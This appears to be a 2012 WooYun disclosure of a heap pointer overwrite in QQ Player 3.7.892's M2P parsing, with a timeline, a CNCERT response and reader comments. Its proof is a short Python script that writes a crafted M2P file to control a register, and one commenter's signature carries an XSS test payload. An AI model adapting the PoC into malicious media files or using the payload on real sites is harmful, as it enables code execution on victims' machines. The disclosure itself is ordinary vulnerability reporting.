当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013408

漏洞标题:QQ影音3.7.892 m2p文件解析堆指针覆盖漏洞

相关厂商:腾讯影音

漏洞作者: 路人甲

提交时间:2012-10-16 16:23

修复时间:2012-11-30 16:24

公开时间:2012-11-30 16:24

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-16: 细节已通知厂商并且等待厂商处理中
2012-10-20: 厂商已经确认,细节仅向厂商公开
2012-10-23: 细节向第三方安全合作伙伴开放
2012-12-14: 细节向核心白帽子及相关领域专家公开
2012-12-24: 细节向普通白帽子公开
2013-01-03: 细节向实习白帽子公开
2012-11-30: 细节向公众公开

简要描述:

QQ影音最新版(3.7.892)解析M2P文件时存在一处堆指针覆盖漏洞,可以导致播放M2P文件时执行任意代码

详细说明:

QQ影音最新版(3.7.892)解析M2P文件时存在一处堆指针覆盖漏洞,可以导致播放M2P文件时执行任意代码
详见测试代码,已在XP上测试通过

漏洞证明:

l = 3315716 * "A"
s1 = ((0,'\x00\x00\x01\xba'), (2048, '\x00\x00\x01\xba'),
(3289120, '\x00\x00\x01\xe0\x07'), (3289273, '\x00\x00\x01\xb3'),
(3289283, '\xba'), (3289452, '\x42\x42\x42\x42'),
(3289468, '\x00\x00\x01\x00'), (3290359, '\x00\x00\x01\x00'),
(3301408, '\x00\x00\x01\xe0\x07'), (3303112, '\x00\x00\x01\x00'))
# EAX overwrite(3289452, '\x42\x42\x42\x42') call eax+0x24

o = open("c:\\poc.m2p","wb")
o.write(l)

for i in range(len(s1)):
o.seek(s1[i][0], 0)
o.write(s1[i][1])

o.close()


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-10-20 18:47

厂商回复:

CNCERT确认漏洞情况,对于exp正对多版本进行确认。先行确认,待进一步联系腾讯公司(近期处置的漏洞事件较多,该事件暂延后)。
按远程攻击,完全影响机密性、完整性、可用性进行评分,rank=10*1.3*1.5=19.5

最新状态:

暂无


漏洞评价:

评论

  1. 2012-10-16 17:18 | 剑心 ( 实习白帽子 | Rank:37 漏洞数:9 | xsser)

    @xsser 为啥这个给cncert,不是应该给某迅么

  2. 2012-10-16 17:22 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @剑心 我们觉得腾讯安全部门对待乌云的做法欠妥,正在联系他们的业务部门,期间的涉及到通用软件问题的由cert通报的

  3. 2012-10-16 17:31 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    楼上两位亮了

  4. 2012-10-16 17:34 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @风萧萧 草 那是别人的马甲!

  5. 2012-10-16 17:37 | 剑心 ( 实习白帽子 | Rank:37 漏洞数:9 | xsser)

    @xsser qq影音的解码器以前是他手下过过来的,现在不知道,但是还是同一个部门在负责,你可以问问,zhd32@vip.qq.com,@tencent的邮箱我忘记了,你直接给他撒。

  6. 2012-10-16 17:57 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    小菜观望中~~~~~~

  7. 2012-10-16 18:04 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    每个会火的帖子里,俺都会出现

  8. 2012-10-19 12:48 | 蓝风 ( 普通白帽子 | Rank:125 漏洞数:25 | 崬汸慾哓 嗼檤焄垳皁 沓猵圊屾亾沬荖 颩憬...)

    EXP 的DOC吗

  9. 2012-10-21 01:56 | yy520 ( 普通白帽子 | Rank:139 漏洞数:12 )

    http://www.exploit-db.com/exploits/21991/

  10. 2012-10-21 21:52 | Defa ( 普通白帽子 | Rank:113 漏洞数:13 | <img src=1 onerror=alert(1)>)

    小菜观望中~~~~~~